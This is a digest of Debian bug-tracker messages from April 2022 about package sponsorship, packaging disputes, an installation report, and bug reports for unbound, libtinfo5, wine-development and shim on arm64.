Bug#1006832: RFS: minetest/5.5.0+dfsg+~1.9.0mt4+dfsg-1 -- Multiplayer infinite-world block sandbox

2022-04-27 Thread Bastian Germann 

Control: reopen -1

Bug#1010272: Installation Report Debian 11.2

2022-04-27 Thread Max Euer 

Package: installation-reports

Boot method:  DVD
Image version:Debian GNU/Linux 11.2.0 _Bullseye_ - Official amd64 
NETINST 20211218-11:12

Date: 31st Mar 2022

Machine:AMD A4-4000 APU with Radeon(tm) HD Graphics
BIOS: MSI FM2-A75MA-P33
Partitions: 
/dev/sda1 FAT32 - unused
 sda2 FAT16 PCDOS
 sda6 swap
 sda6 swap
 sda7 Debian ext4

Base System Installation Checklist:
[O] = OK, [E] = Error (please elaborate below), [ ] = didn't try it

Initial boot:   [O ]
Detect network card:    [O ]
Configure network:  [O ]
Detect media:   [O ]
Load installer modules: [O ]
Clock/timezone setup:   [O ]
User/password setup:    [E ]
Detect hard drives: [O ]
Partition hard drives:  [E ] Warning: Device 0x0800: Inconsistent 
partition table, 2nd entry

Install base system:    [O ]
Install tasks:  [O ]
Install boot loader:    [O ]
Overall install:    [E ]

Comments/Problems:
1st BOOT AFTER THE INSTALLATION I WAS UNABLE TO LOG IN AS ROOT [WRONG 
PASSWORD]

LOG IN AS A USER DID WORK.
I HAD TO DO A RESCUE REBOOT OR
BOOT WITH KERNEL CMD-LINE root=/dev/sda7 init=/bin/bash rw ,
THEN DO PASSWD , RE-ENTERING THE PASSWORD, AFTER THAT ALL WAS WELL
ONGOING PROBLEM AT LEAST SINCE DEBIAN 8

THERE WAS ANOTHER DIFFICULTY WITH THE VGA CARD: WORDS WERE SHIFTED MUCH 
TOO FAR

TO THE LEFT WHICH COULD NOT BE CORRECTED BY THE MONITOR [ACER].
EVENTUALLY ADDING A KERNEL OPTION append="video=VGA-1:800x600R-16@60"
DID THE TRICK HOWEVER HOW TO PHRASE THAT SENTENCE WAS HARD TO FIND!

--
Max Euer - Oud Lemiers 18 - NL6295AT Lemiers -
T  NL0618403128,D024079539727 - E  euer@googlemail.com

Bug#1010266: Re: RFS: base16384/2.2.0-3 [ITP] -- Encode binary files to printable utf16be

2022-04-27 Thread fumiama 
Dear Bastian,

Thanks for your introduction. I have restored the Debian revision to -1 and 
edited the changelog.
Then I sent an email and marked the ITP bug #1010055 as done. Now I would like 
to remove
the moreinfo tag.

Regards,
--
  fumiama

Bug#1010271: unbound-control: Please use unix socket as default control-interface

2022-04-27 Thread Michael Tokarev 

Control: severity -1 wishlist
Control: tag -1 confirmed

27.04.2022 16:48, ceddral wrote:

Package: unbound
Version: 1.15.0-4
Severity: normal
X-Debbugs-Cc: debian...@ceddral.org

Dear Maintainer,

unbound package upgrade introduced a default config to enable remote-control
via tcp socket.


Can you tell please which version did you upgrade from?
Please note that before, unbound in Debian had a patch
to secretly enable remote-control socket which by default
is tcp. In this release I just made it explicit instead of
doing it secretly.


 Please change the default config to use a unix socket and avoid
the attack surface of a tcp socket with ssl authentication. e.g.:
remote-control:
 control-enable: yes
 control-interface: /var/lib/unbound/control.socket


Actually it was my thought to enable control socket (I'm not
sure /var/lib/unbound is a good place for it, /run sounds
better but I need to check if it works when unbound is
chrooted.

unbound.postinst generates the ssl certificates for quite a
long time, these probably should go away too.  And we'd better
check if unbound-control-setup script does the right thing.

So I thought I'd keep it the way it were for a long time.

And the most important is that it is the upstream default
for control socket. Maybe we should specify it in the
config file the way I did it in this release.

Thanks,

/mjt

Bug#1010262: RFS: wifi-qr/0.2-2 -- WiFi Share and Connect with QR

2022-04-27 Thread Bastian Germann 

Something went wrong. The patch debian/patches/Update-0.2-2-File-Function now 
contains in the description:
"""
 Update Man and Menu Shortcut
 .
 wifi-qr (0.2-2) unstable; urgency=medium
 .
   * Improve Summary. (Closes: #989034)
 ...
Bug-Debian: https://bugs.debian.org/989034
"""

This has nothing to do with the patch.

Why do you patch upstream's README.md with that patch?
If you want to provide additional info, create debian/README.Debian.

Your binary package description has some language mistakes and redundant info. 
I suggest:
Description: WiFi password share via QR codes
 Shares WiFi SSID and password via a QR code.
 Generate a QR code of a WiFi network with its password.
 Scan QR codes and easily connect to WiFi Networks.
 .
 For Android, OS version 10 and above is supported.
 .
 For iOS, the Shortcut app supports generating WiFi QR codes.

Bug#996965: CSS help needed for r-cran-bslib (Was: shiny-server in debian)

2022-04-27 Thread Nilesh Patra 



On 27 April 2022 7:41:40 pm IST, Andreas Tille  wrote: 
>> Um, weird.
>> It works fine for me (checked on a clean system in a chroot), are you using 
>> terser provided by "uglifyjs.terser"?
>
>No, just terser from unstable. 

Then maybe you have an older copy. Terser is a virtual package now.

> It works now with uglifyjs.terser (as
>per my last commit).  How can I recreate bootstrap.bundle.min.js.map ?

There should be a source-map option or something similar, you could check the 
manpage/examples once.


Regards,
Nilesh

Bug#996965: CSS help needed for r-cran-bslib (Was: shiny-server in debian)

2022-04-27 Thread Andreas Tille 
Hi Nilesh,

Am Wed, Apr 27, 2022 at 07:26:04PM +0530 schrieb Nilesh Patra:
> > Thanks a lot for your help on this (deserves another $drink from me ;-) )
> 
> This count is increasing with each passing day :)

Just giving honor to those whom deserve honor. ;-)
 
> > I tried to repack[2] but I get
> > 
> > r-cran-bslib/debian/missing_source/bs5(master) $ terser --compress --mangle 
> > -- bootstrap.bundle.js
> > 
> > /usr/share/nodejs/terser/bin/terser:153
> > if (~opts.rawArgs.indexOf("--rename")) {
>^
> 
> Um, weird.
> It works fine for me (checked on a clean system in a chroot), are you using 
> terser provided by "uglifyjs.terser"?

No, just terser from unstable.  It works now with uglifyjs.terser (as
per my last commit).  How can I recreate bootstrap.bundle.min.js.map ?

Kind regards

Andreas.

-- 
http://fam-tille.de

Bug#1010266: RFS: base16384/2.2.0-3 [ITP] -- Encode binary files to printable utf16be

2022-04-27 Thread fumiama 
I have sought many articles about closing that ITP bug, but still not sure for 
whether this reply will close #1010055 , please forgive me for this trying .

Bug#1010256: ITP: rust-ahash -- non-cryptographic hash function

2022-04-27 Thread Jonas Smedegaard 
Quoting James McCoy (2022-04-27 15:55:34)
> On Wed, Apr 27, 2022, 09:36 Jonas Smedegaard  wrote:
> > Quoting James McCoy (2022-04-27 15:05:54)
> > > On Wed, Apr 27, 2022 at 10:36:54AM +0200, Jonas Smedegaard wrote:
> > > > * Package name: rust-ahash
> > > >   Version : 0.7.6
> > > >   Upstream Author : Tom Kaitchuck 
> > > > * URL : https://github.com/tkaitchuck/ahash
> > > > * License : Apache-2.0 or Expat
> > > >   Programming Lang: Rust
> > > >   Description : non-cryptographic hash function
> > > >
> > > >  AHash is the fastest, DOS resistant hash currently available in Rust.
> > > >  AHash is intended *exclusively* for use in in-memory hashmaps.
> > > >  .
> > > >  AHash's output is of high quality
> > > >  but aHash is **not** a cryptographically secure hash.
> > > >
> > > > This package is needed by ITP packages atomic-data-rust and fractal.
> > > > It will be maintained in the collaborative debian section at salsa,
> > > > here: https://salsa.debian.org/debian/rust-ahash
> > >
> > > This was already being worked on in debcargo-conf[0][1].  Is there a
> > > particular reason this wasn't coordinated with the rust team?
> >
> > Uhm, the very thing you replied to *is* my communication about this.
> >
> 
> Communication is different from coordination. There was already in 
> progress packaging.  Instead of working with us to get that accepted, 
> you've announced that you're taking over the package and maintaining 
> it elsewhere from the bulk of the rust packages.

Sorry for using the wrong word.

I do not recognize the picture you paint of what has happened here.

What I announced was so-called "intent to package" (not a takeover).

>From my perspective, you failed to coordinate _your_ intent to package 
which lead to this unfortunate situation of duplicate efforts.

Please in future consider filing ITPs to avoid such situations.


 - Jonas

-- 
 * Jonas Smedegaard - idealist & Internet-arkitekt
 * Tlf.: +45 40843136  Website: http://dr.jones.dk/

 [x] quote me freely  [ ] ask before reusing  [ ] keep private

signature.asc
Description: signature

Bug#1010262:

2022-04-27 Thread Ko Ko Ye` 
tags 1010262 - moreinfo

---

Description: WiFi password share through QR code
 WiFi SSID and Password through QR Code.
 Generate QR Code of WiFi Network and password.
 Scan QR Codes and Easily Connect to WiFi Networks.
 .
 For Android, OS version 10 and above is support
 WiFi Password Share and Scan via QR Code.
 Also Mobile Hotspot Password can generate QR Code.
 .
 For iOS, Shortcut app is support Generate Wi-Fi QR.
 .
 WiFi-QR work with QR Scan File or Image and Connect to
 WiFi Network. Share or Scan your WiFi Password via QR.

-- 

with regards *Ko Ko Ye` *

Bug#1010256: ITP: rust-ahash -- non-cryptographic hash function

2022-04-27 Thread James McCoy 
On Wed, Apr 27, 2022, 09:36 Jonas Smedegaard  wrote:

> Hi James,
>
> Quoting James McCoy (2022-04-27 15:05:54)
> > On Wed, Apr 27, 2022 at 10:36:54AM +0200, Jonas Smedegaard wrote:
> > > * Package name: rust-ahash
> > >   Version : 0.7.6
> > >   Upstream Author : Tom Kaitchuck 
> > > * URL : https://github.com/tkaitchuck/ahash
> > > * License : Apache-2.0 or Expat
> > >   Programming Lang: Rust
> > >   Description : non-cryptographic hash function
> > >
> > >  AHash is the fastest, DOS resistant hash currently available in Rust.
> > >  AHash is intended *exclusively* for use in in-memory hashmaps.
> > >  .
> > >  AHash's output is of high quality
> > >  but aHash is **not** a cryptographically secure hash.
> > >
> > > This package is needed by ITP packages atomic-data-rust and fractal.
> > > It will be maintained in the collaborative debian section at salsa,
> > > here: https://salsa.debian.org/debian/rust-ahash
> >
> > This was already being worked on in debcargo-conf[0][1].  Is there a
> > particular reason this wasn't coordinated with the rust team?
>
> Uhm, the very thing you replied to *is* my communication about this.
>

Communication is different from coordination. There was already in progress
packaging.  Instead of working with us to get that accepted, you've
announced that you're taking over the package and maintaining it elsewhere
from the bulk of the rust packages.

Bug#996965: CSS help needed for r-cran-bslib (Was: shiny-server in debian)

2022-04-27 Thread Nilesh Patra 
On Wed, Apr 27, 2022 at 03:22:59PM +0200, Andreas Tille wrote:
> Thanks a lot for your help on this (deserves another $drink from me ;-) )

This count is increasing with each passing day :)

> Those three failing tests are patched out now.

Fine
 
> > BTW please repack all the minified files and minify them during the build 
> > using terser[1] or something similar
> 
> I tried to repack[2] but I get
> 
> r-cran-bslib/debian/missing_source/bs5(master) $ terser --compress --mangle 
> -- bootstrap.bundle.js
> 
> /usr/share/nodejs/terser/bin/terser:153
> if (~opts.rawArgs.indexOf("--rename")) {
   ^

Um, weird.
It works fine for me (checked on a clean system in a chroot), are you using 
terser provided by "uglifyjs.terser"?
Can you try running

$ terser --compress --mangle -o bootstrap.bundle.min.js bootstrap.bundle.js
$ ls
bootstrap.bundle.js  bootstrap.bundle.min.js  get

Alternatively, you can also use uglifyjs[3]

> > [1]: https://tracker.debian.org/pkg/node-terser
> [2] 
> https://salsa.debian.org/r-pkg-team/r-cran-bslib/-/tree/master/debian/missing_source/bs5
[3]: https://tracker.debian.org/pkg/uglifyjs

Regards
Nilesh


signature.asc
Description: PGP signature

Bug#1010271: unbound-control: Please use unix socket as default control-interface

2022-04-27 Thread ceddral 
Package: unbound
Version: 1.15.0-4
Severity: normal
X-Debbugs-Cc: debian...@ceddral.org

Dear Maintainer,

unbound package upgrade introduced a default config to enable remote-control
via tcp socket. Please change the default config to use a unix socket and avoid
the attack surface of a tcp socket with ssl authentication. e.g.:
remote-control:
control-enable: yes
control-interface: /var/lib/unbound/control.socket

Cheers
ceddral


-- System Information:
Debian Release: bookworm/sid
  APT prefers unstable
  APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 5.16.0-3-amd64 (SMP w/8 CPU threads; PREEMPT)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8), 
LANGUAGE=en_US:en
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages unbound depends on:
ii  adduser  3.121
ii  init-system-helpers  1.62
ii  libc62.33-7
ii  libevent-2.1-7   2.1.12-stable-5
ii  libnghttp2-141.43.0-1
ii  libprotobuf-c1   1.3.3-1+b2
ii  libpython3.103.10.4-3
ii  libssl1.11.1.1n-1
ii  libsystemd0  250.4-1
ii  lsb-base 11.1.0

Versions of packages unbound recommends:
ii  dns-root-data  2021011101
ii  openssl1.1.1n-1

Versions of packages unbound suggests:
pn  apparmor  

-- Configuration Files:
/etc/unbound/unbound.conf changed [not included]

-- no debconf information

Bug#1010262: RFS: wifi-qr/0.2-2 -- WiFi Share and Connect with QR

2022-04-27 Thread Ko Ko Ye` 
Dear Bastian


Thanks for reminding  #989034
Update and fix.

Unrelease to  unstable

On Wed, Apr 27, 2022 at 6:15 PM Bastian Germann  wrote:

> Control: tags -1 moreinfo
>
> You have to target unstable or experimental.
>
> For the new patch: Please fill the DEP-3 template or remove lines that you
> do not want to use.
>
> What about bug #989034? Please fix this.
>
> When you are done, please untag moreinfo.
>
>

-- 

with regards *Ko Ko Ye` *


kokoye2...@gmail.com
kokoye2...@ubuntu.com

https://www.linkedin.com/in/kokoye2007
https://ubuntu-mm.net
https://kokoye2007.github.io

Bug#1010270: Recent update break xterm

2022-04-27 Thread Klaus Ethgen 
Package: libtinfo5
Version: 6.3+20220423-1
Severity: normal

Since the last update of this package, applications running inside of
xterm are not always able to update the window title.

Instead, control output are breaking the layout of the application.

Broken Applications:
- mutt
- cmus

Still working:
- zsh

-- System Information:
Debian Release: bookworm/sid
  APT prefers experimental
  APT policy: (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 5.16.17 (SMP w/8 CPU threads)
Kernel taint flags: TAINT_PROPRIETARY_MODULE, TAINT_FIRMWARE_WORKAROUND, 
TAINT_OOT_MODULE
Locale: LANG=C, LC_CTYPE=C.UTF-8 (charmap=UTF-8), LANGUAGE not set
Shell: /bin/sh linked to /bin/dash
Init: sysvinit (via /sbin/init)

Versions of packages libtinfo5 depends on:
ii  libc6  2.33-7

libtinfo5 recommends no packages.

libtinfo5 suggests no packages.

-- no debconf information

-- 
Klaus Ethgen   http://www.ethgen.ch/
pub  4096R/4E20AF1C 2011-05-16Klaus Ethgen 
Fingerprint: 85D4 CA42 952C 949B 1753  62B3 79D0 B06F 4E20 AF1C


signature.asc
Description: PGP signature

Bug#1010269: crashes immediately at start

2022-04-27 Thread VA 

Package: wine-development
Version: 6.23~repack-1

Whenever I run any wine-development command, for example 
`wine-development winecfg`, even in a new, empty, WINEPREFIX, I get a 
crash immediately:


% wine-development winecfg
err:environ:read_nls_file failed to load 10/0
zsh: segmentation fault  wine-development winecfg

with more verbose logging:

% WINEDEBUG=+all wine-development winecfg
err:environ:read_nls_file failed to load 10/0
trace:virtual:NtAllocateVirtualMemory 0x 0x7ffe 1000 
3000 0002

trace:virtual:dump_view View: 0x7ffe - 0x7ffe0fff (valloc)
trace:virtual:dump_view   0x7ffe - 0x7ffe0fff c-r--
trace:virtual:NtAllocateVirtualMemory 0x (nil) 0020 102000 
0004

trace:virtual:map_view got mem in reserved area 0x3fe0-0x4000
trace:virtual:dump_view View: 0x3fe0 - 0x3fff (valloc)
trace:virtual:dump_view   0x3fe0 - 0x3fff --rw-
trace:virtual:NtAllocateVirtualMemory 0x 0x3ffe 0002 
1000 0004

trace:virtual:dump_view View: 0x3fe0 - 0x3fff (valloc)
trace:virtual:dump_view   0x3fe0 - 0x3ffd --rw-
trace:virtual:dump_view   0x3ffe - 0x3fff c-rw-
sock_init: shutdown() causes EOF
wineserver: starting (pid=1315093)
0020: *fd* 02e1 -> 23
0024: *fd* 7 <- 23
0024: *fd* 9 <- 24
0024: init_first_thread( unix_pid=1315091, unix_tid=1315091, 
debug_level=1, reply_fd=7, wait_fd=9 )
0024: init_first_thread() = 0 { pid=0020, tid=0024, 
server_start=1d85a3ae26eac84 (-0.630), session_id=0001, 
info_size=0, machines={8664,014c} }
0024: open_mapping( access=000f001f, attributes=, rootdir=, 
name=L"\\KernelObjects\\__wine_user_shared_data" )

0024: open_mapping() = 0 { handle=0004 }
0024: get_handle_fd( handle=0004 )
0024: *fd* 0004 -> 20
0024: get_handle_fd() = 0 { type=1, cacheable=1, access=000f001f, 
options=0020 }

0024: close_handle( handle=0004 )
0024: close_handle() = 0
3189712.026:0020:0024:trace:ntdll:init_cpu_info <- CPU arch 0, level 23, 
rev 28928, features 0xebf9bfff
3189712.026:0020:0024:trace:ntdll:NtQueryInformationToken 
(0xfffa,1,0xffc6efd4,76,0xffc6efb0)

0024: get_token_sid( handle=fffa, which_sid=0001 )
0024: get_token_sid() = 0 { sid_len=28, sid={S-1-5-21-0-0-0-1000} }
3189712.027:0020:0024:trace:reg:NtCreateKey 
((nil),L"\\Registry\\User\\S-1-5-21-0-0-0-1000\\Software\\Wine",,0,f003f,0xffc6f360)
0024: create_key( access=000f003f, options=, 
objattr={rootdir=,attributes=0040,sd={},name=L"\\Registry\\User\\S-1-5-21-0-0-0-1000\\Software\\Wine"}, 
class=L"" )

0024: create_key() = OBJECT_NAME_NOT_FOUND { hkey=, created=0 }
3189712.027:0020:0024:trace:reg:NtCreateKey <- (nil)
3189712.027:0020:0024:trace:file:find_drive_rootA "/tmp/plop-262610" -> 
drive Z:, root="/", name="/tmp/plop-262610"

0024: *killed* exit_code=0
zsh: segmentation fault  WINEDEBUG=+all wine-development winecfg

Bug#1010256: ITP: rust-ahash -- non-cryptographic hash function

2022-04-27 Thread Jonas Smedegaard 
X-Debbugs-Cc: James McCoy , debian-r...@lists.debian.org

[ re-posted using X-Debbugs-Cc to avoid some routing issues ]

Hi James,

Quoting James McCoy (2022-04-27 15:05:54)
> On Wed, Apr 27, 2022 at 10:36:54AM +0200, Jonas Smedegaard wrote:
> > * Package name: rust-ahash
> >   Version : 0.7.6
> >   Upstream Author : Tom Kaitchuck 
> > * URL : https://github.com/tkaitchuck/ahash
> > * License : Apache-2.0 or Expat
> >   Programming Lang: Rust
> >   Description : non-cryptographic hash function
> > 
> >  AHash is the fastest, DOS resistant hash currently available in Rust.
> >  AHash is intended *exclusively* for use in in-memory hashmaps.
> >  .
> >  AHash's output is of high quality
> >  but aHash is **not** a cryptographically secure hash.
> > 
> > This package is needed by ITP packages atomic-data-rust and fractal.
> > It will be maintained in the collaborative debian section at salsa,
> > here: https://salsa.debian.org/debian/rust-ahash
> 
> This was already being worked on in debcargo-conf[0][1].  Is there a
> particular reason this wasn't coordinated with the rust team?

Uhm, the very thing you replied to *is* my communication about this.

If you meant why I didn't use internal Rust-team-specific communication 
channels, then it is because I am not part of that team and find it 
wrong for Debian teams to internalize such communication.


Kind regards,

 - Jonas

-- 
 * Jonas Smedegaard - idealist & Internet-arkitekt
 * Tlf.: +45 40843136  Website: http://dr.jones.dk/

 [x] quote me freely  [ ] ask before reusing  [ ] keep private

signature.asc
Description: signature

Bug#1010256: ITP: rust-ahash -- non-cryptographic hash function

2022-04-27 Thread Jonas Smedegaard 
Hi James,

Quoting James McCoy (2022-04-27 15:05:54)
> On Wed, Apr 27, 2022 at 10:36:54AM +0200, Jonas Smedegaard wrote:
> > * Package name: rust-ahash
> >   Version : 0.7.6
> >   Upstream Author : Tom Kaitchuck 
> > * URL : https://github.com/tkaitchuck/ahash
> > * License : Apache-2.0 or Expat
> >   Programming Lang: Rust
> >   Description : non-cryptographic hash function
> > 
> >  AHash is the fastest, DOS resistant hash currently available in Rust.
> >  AHash is intended *exclusively* for use in in-memory hashmaps.
> >  .
> >  AHash's output is of high quality
> >  but aHash is **not** a cryptographically secure hash.
> > 
> > This package is needed by ITP packages atomic-data-rust and fractal.
> > It will be maintained in the collaborative debian section at salsa,
> > here: https://salsa.debian.org/debian/rust-ahash
> 
> This was already being worked on in debcargo-conf[0][1].  Is there a
> particular reason this wasn't coordinated with the rust team?

Uhm, the very thing you replied to *is* my communication about this.

If you meant why I didn't use internal Rust-team-specific communication 
channels, then it is because I am not part of that team and find it 
wrong for Debian teams to internalize such communication.


Kind regards,

 - Jonas

-- 
 * Jonas Smedegaard - idealist & Internet-arkitekt
 * Tlf.: +45 40843136  Website: http://dr.jones.dk/

 [x] quote me freely  [ ] ask before reusing  [ ] keep private

signature.asc
Description: signature

Bug#821801: smbclient: Problems with smbclient since badlock update

2022-04-27 Thread Michael Tokarev 

Control: tag -1 + moreinfo

Replying to an old bug...

On Tue, 19 Apr 2016 13:43:29 +0200 tkla  wrote:

Package: smbclient
Version: 4.2.10
Severity: normal
Tags: upstream

Dear Maintainer,
since the badlock fixes my backup software Amanda stopped working when we're
trying to backup Windows shares.

Please have a look at the bug report i have opened at upstream
https://bugzilla.samba.org/show_bug.cgi?id=11854


Hi!

Do you still have this problem with current version of samba and amanda?
I suspect the issue you had with stretch samba (4.4) update --
ERROR: MYSERVER: smbclient: Error reading password from file descriptor 3: 
empty password -
has been fixed quite long time ago in amanda.

Thank you!

/mjt

Bug#1009765: RFS: vertcoin/0.18.0-1 -- peer-to-peer network based digital currency - CLI tools

2022-04-27 Thread Bastian Germann 

Control: tags -1 moreinfo

There are problems with d/changelog (format, newline separating one entry, ending newline), with d/copyright (order of 
matching patterns, missing-license-text-in-dep5-copyright, please get rid of the related overrides), and with d/control 
(maintainer/uploaders) just by looking at the mentors page. You should fix them (make the package lintian clean, not 
using any overrides) and then untag moreinfo.

Bug#996965: CSS help needed for r-cran-bslib (Was: shiny-server in debian)

2022-04-27 Thread Andreas Tille 
Hi Nilesh,

Am Wed, Apr 27, 2022 at 04:30:40PM +0530 schrieb Nilesh Patra:
> On Wed, Apr 27, 2022 at 10:59:25AM +0200, Andreas Tille wrote:
> > ── Error (test-theme-base-colors.R:45:3): bs3 base colors 
> > ──
> > Error in `compile_data(sass_input, options)`: Error: Invalid CSS after "... 
> > floor(math": expected expression (e.g. 1px, bold), was 
> > ".div($grid-gutter-w"
> > on line 369:46 of 
> > ../../../../../../usr/share/nodejs/bootstrap-sass/assets/stylesheets/bootstrap/_variables.scss
> 
> This was coming from node-bootstrap-sass directly as it was using new API for 
> some
> functions which is not yet compatible with sass.
> I have fixed them. Now, 200 tests pass and just a couple of tests fail and I 
> am out of
> time to check those now. _maybe_ you could skip for now and upload to 
> unstable (which is high prio)

Thanks a lot for your help on this (deserves another $drink from me ;-) )
Those three failing tests are patched out now.

> BTW please repack all the minified files and minify them during the build 
> using terser[1] or something similar

I tried to repack[2] but I get

r-cran-bslib/debian/missing_source/bs5(master) $ terser --compress --mangle -- 
bootstrap.bundle.js

/usr/share/nodejs/terser/bin/terser:153
if (~opts.rawArgs.indexOf("--rename")) {
  ^
TypeError: Cannot read property 'indexOf' of undefined
at Object. (/usr/share/nodejs/terser/bin/terser:153:19)
at Module._compile (internal/modules/cjs/loader.js:1085:14)
at Object.Module._extensions..js (internal/modules/cjs/loader.js:1114:10)
at Module.load (internal/modules/cjs/loader.js:950:32)
at Function.Module._load (internal/modules/cjs/loader.js:790:12)
at Function.executeUserEntryPoint [as runMain] 
(internal/modules/run_main.js:75:12)
at internal/main/run_main_module.js:17:47

/usr/share/nodejs/terser/tools/exit.js:14
throw exit;
^
[Function: exit]


Any idea what might be wrong?

Kind regards

  Andreas.

> [1]: https://tracker.debian.org/pkg/node-terser

[2] 
https://salsa.debian.org/r-pkg-team/r-cran-bslib/-/tree/master/debian/missing_source/bs5

-- 
http://fam-tille.de

Bug#1010256: ITP: rust-ahash -- non-cryptographic hash function

2022-04-27 Thread James McCoy 
On Wed, Apr 27, 2022 at 10:36:54AM +0200, Jonas Smedegaard wrote:
> * Package name: rust-ahash
>   Version : 0.7.6
>   Upstream Author : Tom Kaitchuck 
> * URL : https://github.com/tkaitchuck/ahash
> * License : Apache-2.0 or Expat
>   Programming Lang: Rust
>   Description : non-cryptographic hash function
> 
>  AHash is the fastest, DOS resistant hash currently available in Rust.
>  AHash is intended *exclusively* for use in in-memory hashmaps.
>  .
>  AHash's output is of high quality
>  but aHash is **not** a cryptographically secure hash.
> 
> This package is needed by ITP packages atomic-data-rust and fractal.
> It will be maintained in the collaborative debian section at salsa,
> here: https://salsa.debian.org/debian/rust-ahash

This was already being worked on in debcargo-conf[0][1].  Is there a
particular reason this wasn't coordinated with the rust team?

[0]: https://salsa.debian.org/rust-team/debcargo-conf/-/tree/master/src/ahash/
[1]: 
https://alioth-lists.debian.net/pipermail/pkg-rust-maintainers/2022-March/018795.html

Cheers,
-- 
James
GPG Key: 4096R/91BF BF4D 6956 BD5D F7B7  2D23 DFE6 91AE 331B A3DB

Bug#1010267: ITP: tractor -- Setup an onion routing proxy

2022-04-27 Thread Danial Behzadi 
Package: wnpp
Severity: wishlist
Owner: Danial Behzadi 
X-Debbugs-Cc: debian-de...@lists.debian.org

* Package name: tractor
  Version : 3.12
  Upstream Author : Danial Behzadi 
* URL : https://framagit.org/tractor/tractor/
* License : GPL
  Programming Lang: Python
  Description : Setup an onion routing proxy

 This package uses Python stem library to provide
 a connection through the onion proxy and sets up
 proxy in user session, so you don't have to mess
 up with TOR on your system anymore.

 - I use this package to setup some tor connections in user
   session, quickly turn bridges on/off or setting/unsetting
   tor proxy in my session.
 - I will maintain the software and the package for Debian,
   but since I'm not a DD yet, I'll need a sponsor for it.108

Bug#1010268: ITP: node-sinclair-typebox -- JSON Schema Type Builder with Static Type Resolution for TypeScript

2022-04-27 Thread Yadd 
Package: wnpp
Severity: wishlist
Owner: Yadd 
X-Debbugs-Cc: debian-de...@lists.debian.org

* Package name: node-sinclair-typebox
  Version : 0.23.4
  Upstream Author : sinclairzx81 
* URL : https://github.com/sinclairzx81/typebox
* License : Expat
  Programming Lang: JavaScript
  Description : JSON Schema Type Builder with Static Type Resolution for 
TypeScript

@sinclair/typeBox is a library that creates in-memory JSON Schema objects
that can be statically inferred as TypeScript types. The schemas produced by
this library are designed to match the static type checking rules of the
TypeScript compiler. TypeBox allows one to create a unified type that can be
both statically asserted by the TypeScript compiler and runtime asserted
using standard JSON Schema validation.

@sinclair/typeBox can be used as a simple tool to build up complex schemas or
integrated into RPC or REST services to help validate JSON data received over
the wire. TypeBox does not provide any JSON schema validation. Please use
libraries such as AJV to validate schemas built with this library.

node-sinclair-typebox is a new dependency of jest and will be maintained
under JS Team umbrella

Bug#992073: shim-signed: restore arm64 support

2022-04-27 Thread Steve McIntyre 
On Wed, Apr 27, 2022 at 01:33:47PM +0100, Wookey wrote:
>Binutils 2.38 now has proper PE/COFF output support for arm64.
>(And is in unstable and testing.)
>https://sourceware.org/pipermail/binutils/2022-February/119721.html
>
>I think this is the relevant bit:
>"Support for efi-app-aarch64, efi-rtdrv-aarch64 and
> efi-bsdrv-aarch64 has been added to objcopy in order to enable
> UEFI development using binutils."
>
>So we should now be able to build shim-signed on arm64 without the
>hackery that was previously used to simulate this format (and then had
>to be disabled because it broke things (AIUI)).
>
>I'm not sure how much work this is or if anyone else is already
>working on it?  I presume it should be a simplification by removing
>the previous workarounds and bulding just as we do on x86 now?
>
>Happy to have a look if someone gives me some pointers. (A look round
>the package for an hour was not sufficient for me to work out how shim
>itself or the various other bits is all put together (shim-signed,
>shim-helpers--signed etc) and where it needs poking).

I'm hacking on shim right now, setting up local CI etc. to help me
with testing. As soon as I can validate that arm64 stuff is working
correctly now, I'll take out the hacks I added. Give me a few days...

-- 
Steve McIntyre, Cambridge, UK.st...@einval.com
"The problem with defending the purity of the English language is that
 English is about as pure as a cribhouse whore. We don't just borrow words; on
 occasion, English has pursued other languages down alleyways to beat them
 unconscious and rifle their pockets for new vocabulary."  -- James D. Nicoll

Bug#1010004: RFS: odr-dabmod/2.6.0-1 [ITP] -- DAB modulator compliant to ETSI EN 300 401

2022-04-27 Thread Bastian Germann 

Am 27.04.22 um 14:13 schrieb Robin ALEXANDER:

I now have 1 question. When I built these packages, debuild generated
the xxx_amd64.changes files. Why do I have "amd64" in the filename (I
understand it relates to the X86_64 architecture)?
For your information, the source is mainly C++ based and it compiles
properly under arm64 and arm/v7 as well. Should I have ran debuild in a
different manner or is it going to be taken care of by the debian
packaging process later on?


You caompiled the package on a x86_64 PC, so that behaviour and your use of 
debuild is okay.
When you set "Architecture: any" on a binary package, the buildd network will try to compile the package on every 
Debian-supported architecture and kernel, which includes armel, armhf, and arm64.

Bug#1010266: RFS: base16384/2.2.0-3 [ITP] -- Encode binary files to printable utf16be

2022-04-27 Thread Bastian Germann 

Control: tags -1 moreinfo

On Wed, 27 Apr 2022 20:02:18 +0800 fumiama  wrote:

Changes for the initial release:

 base16384 (2.2.0-3) unstable; urgency=medium
 .
   * Fix some issues in packaging. Closes: #1010055 (ITP).


Please always keep the -1 Debian revision until sour package is sponsored.
Also, according to my message, please say "Initial Release. Closes: #1010055 
(ITP)." in the changelog.
Report your changes in this RFS bug, not in the changelog.
I am tagging moreinfo. Please untag on providing a new revision.

Bug#992073: shim-signed: restore arm64 support

2022-04-27 Thread Wookey 
Binutils 2.38 now has proper PE/COFF output support for arm64.
(And is in unstable and testing.)
https://sourceware.org/pipermail/binutils/2022-February/119721.html

I think this is the relevant bit:
"Support for efi-app-aarch64, efi-rtdrv-aarch64 and
 efi-bsdrv-aarch64 has been added to objcopy in order to enable
 UEFI development using binutils."

So we should now be able to build shim-signed on arm64 without the
hackery that was previously used to simulate this format (and then had
to be disabled because it broke things (AIUI)).

I'm not sure how much work this is or if anyone else is already
working on it?  I presume it should be a simplification by removing
the previous workarounds and bulding just as we do on x86 now?

Happy to have a look if someone gives me some pointers. (A look round
the package for an hour was not sufficient for me to work out how shim
itself or the various other bits is all put together (shim-signed,
shim-helpers--signed etc) and where it needs poking).

Wookey
-- 
Principal hats:  Debian, Wookware, ARM
http://wookware.org/


signature.asc
Description: PGP signature

Bug#976960: systemd: Please package systemd-userdbd and systemd-homed

2022-04-27 Thread Vasudev Kamath 


Hi Michael,

> I still fail to see the use-case for homed, tbh and the current
> implementation still requires quite a few hacks (see the fosdem 2020
> talk of Lennart and the problems e.g. with SSH keys).

> Atm this appears more like a tech-preview/demo and I don't feel
> comfortable yet supporting it.
> This can be reconsidered in bookworm.

